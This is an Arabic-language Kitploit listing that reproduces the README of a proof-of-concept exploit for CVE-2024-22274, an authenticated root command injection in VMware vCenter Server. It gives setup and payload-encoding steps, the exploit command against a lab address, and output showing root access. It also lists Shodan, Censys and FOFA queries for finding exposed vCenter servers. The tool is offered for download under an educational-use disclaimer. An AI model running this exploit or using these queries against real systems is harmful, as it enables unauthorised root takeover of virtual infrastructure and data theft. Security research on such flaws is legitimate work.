Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-22274-RCE — PoC - تنفيذ التعليمات البرمجية عن بُعد مع المصادقة في VMware vCenter Server (استغلال) | Kitploit
أدوات/GitHubGitHub/l0n3m4n/cve-2024-22274-rce
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالقيادة والسيطرةالفريق الأحمر
GitHubl0n3m4n/cve-2024-22274-rce

CVE-2024-22274-RCE

PoC - تنفيذ التعليمات البرمجية عن بُعد مع المصادقة في VMware vCenter Server (استغلال)

عرض المستودع
456منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

تصعيد الامتيازات: RCE مصادق عليه في VMware vCenter Server

Facebook X Medium Python Kali

📜 الوصف

مكونات واجهة برمجة التطبيقات "com.vmware.appliance.recovery.backup.job.create" و "com.vmware.appliance.recovery.backup.validate" معرضة لهجوم حقن علم يمكن استغلاله لتنفيذ أوامر عشوائية كمستخدم الجذر على النظام المستهدف.

📚 جدول المحتويات

  • 📜 الوصف
  • 🛠️ التثبيت
  • ⚙️ الاستخدام
  • 🔎 الاكتشاف
  • 📝 ملاحظات
  • 💁 المراجع
  • 📢 إخلاء المسؤولية

🛠️ التثبيت والتكوين

[!NOTE] للعمل مع إثبات المفهوم هذا، يجب أن تمتلك بيانات اعتماد صالحة وأن تسجل الدخول إلى شل VMware vCenter Server عبر SSH. يجب أن يكون لدى المستخدم دور "المسؤول"، كما هو محدد في ملف vcenter_creds.txt.

root@kitploit:~
$ git clone https://github.com/l0n3m4n/CVE-2024-22274-RCE.git
$ cd CVE-2024-22274-RCE 
$ python3 -m venv venv && source venv/bin/activate
$ pip install -r requirements.txt 

قم بتشغيل أو تعديل user2base64.sh لتشفير المستخدم الجديد المضاف إلى base64 وسينشئ تلقائياً payload.txt

root@kitploit:~

$ bash user2base64.sh
Payload has been encoded to base64, saved payload.txt                                 

⚙️ الاستخدام

VMware-vCenter

الإصدار الضعيف

vulnerable-version

التنفيذ والاستغلال الناجح

root@kitploit:~
$ python3 CVE-2024-22274-RCE.py -t 192.168.56.103 -P 22 -p payload.txt -c vCenter_creds.txt
 ___ ___ _______                                          ______               __              
|   |   |   |   |.--.--.--.---.-.----.-----.______.--.--.|      |.-----.-----.|  |_.-----.----.
|   |   |       ||  |  |  |  _  |   _|  -__|______|  |  ||   ---||  -__|     ||   _|  -__|   _|
 \_____/|__|_|__||________|___._|__| |_____|       \___/ |______||_____|__|__||____|_____|__|  
    
                Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
                                                                              
[+] Connected to 192.168.56.103 via SSH
[+] Payload executed successfully. Output: 
   uid=0(root) gid=0(root) groups=0(root)

[+] Exploitation successful: You have root access.
[+] Finished executing commands on 192.168.56.103

تنفيذ ناجح ولكن لا يوجد وصول جذر

هذا المثال يعني أنك تتصل ولكن الحمولة لم تُكوّن أو تُحمّل بشكل صحيح. راجع إثبات المفهوم PDF للحصول على معلومات أكثر تفصيلاً.

root@kitploit:~
 ___ ___ _______                                          ______               __              
|   |   |   |   |.--.--.--.---.-.----.-----.______.--.--.|      |.-----.-----.|  |_.-----.----.
|   |   |       ||  |  |  |  _  |   _|  -__|______|  |  ||   ---||  -__|     ||   _|  -__|   _|
 \_____/|__|_|__||________|___._|__| |_____|       \___/ |______||_____|__|__||____|_____|__|  
    
                Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
                                                                              
[+] Connected to 192.168.56.103 via SSH
[+] Payload executed successfully. Output: 
   No privileges escalation detected.

[+] Exploitation failed: Root access not obtained.
[+] Finished executing commands on 192.168.56.103

اسم المستخدم أو كلمة المرور مفقودة في ملف التكوين

root@kitploit:~
 ___ ___ _______                                          ______               __              
|   |   |   |   |.--.--.--.---.-.----.-----.______.--.--.|      |.-----.-----.|  |_.-----.----.
|   |   |       ||  |  |  |  _  |   _|  -__|______|  |  ||   ---||  -__|     ||   _|  -__|   _|
 \_____/|__|_|__||________|___._|__| |_____|       \___/ |______||_____|__|__||____|_____|__|  
    
                Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
                                                                              
[-] Error: Username or password not found in configuration file.

فشل الاتصال أو خطأ SSH

يرجى التحقق من عنوان المضيف وبيانات الاعتماد.

root@kitploit:~
 ___ ___ _______                                          ______               __              
|   |   |   |   |.--.--.--.---.-.----.-----.______.--.--.|      |.-----.-----.|  |_.-----.----.
|   |   |       ||  |  |  |  _  |   _|  -__|______|  |  ||   ---||  -__|     ||   _|  -__|   _|
 \_____/|__|_|__||________|___._|__| |_____|       \___/ |______||_____|__|__||____|_____|__|  
    
                Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
                                                                              
[-] Error: [SSH Error] Connection to 192.168.56.103 failed.

🔎 الاكتشاف

  • CENSYS: "VMware vCenter"، المرشح: services.port: 443 AND tags: "VMware"
  • FOFA: title="VMware vCenter"، المرشح: port="443" && title="VMware vCenter"
  • SHODAN: "VMware vCenter"، المرشح: port:443 "VMware vCenter"

📝 ملاحظات

إثبات المفهوم هذا لن يكون فعالاً إذا لم تفهم كيفية تفسير السكريبت، حيث تم تغييره عمداً لمنع "script kiddies" من مجرد نسخه وتشغيله دون فهم. VMware vCenter Server هو مكون حاسم في إدارة البيئات الافتراضية، إذا تمكن شخص من الوصول إليه يمكنه الحصول على سيطرة كاملة على البنية التحتية الافتراضية واستخراج البيانات الحساسة. تم تصميم إثبات المفهوم هذا لمن لديهم بالفعل خبرة تقنية صغيرة لاستخدامه بشكل صحيح، لذا إذا كنت من فئة script kiddies وتهدف إلى إحداث اضطراب دون فهم الآثار، فإن هذا الاستغلال لن يكون مفيداً لك.

💁 المراجع

  • http://www.vmware.com/security/advisories
  • https://nvd.nist.gov/vuln/detail/CVE-2024-22274
  • https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-202405-4049
  • https://bdu.fstec.ru/vul/2024-05108
  • https://github.com/advisories/GHSA-xm44-79f8-q8r7

📢 إخلاء المسؤولية

تم توفير هذه الأداة لأغراض تعليمية وبحثية فقط. لا يتحمل المنشئ أي مسؤولية عن أي إساءة استخدام أو ضرر ناتج عن الأداة. إنشاء مشكلة

تنزيل الأداة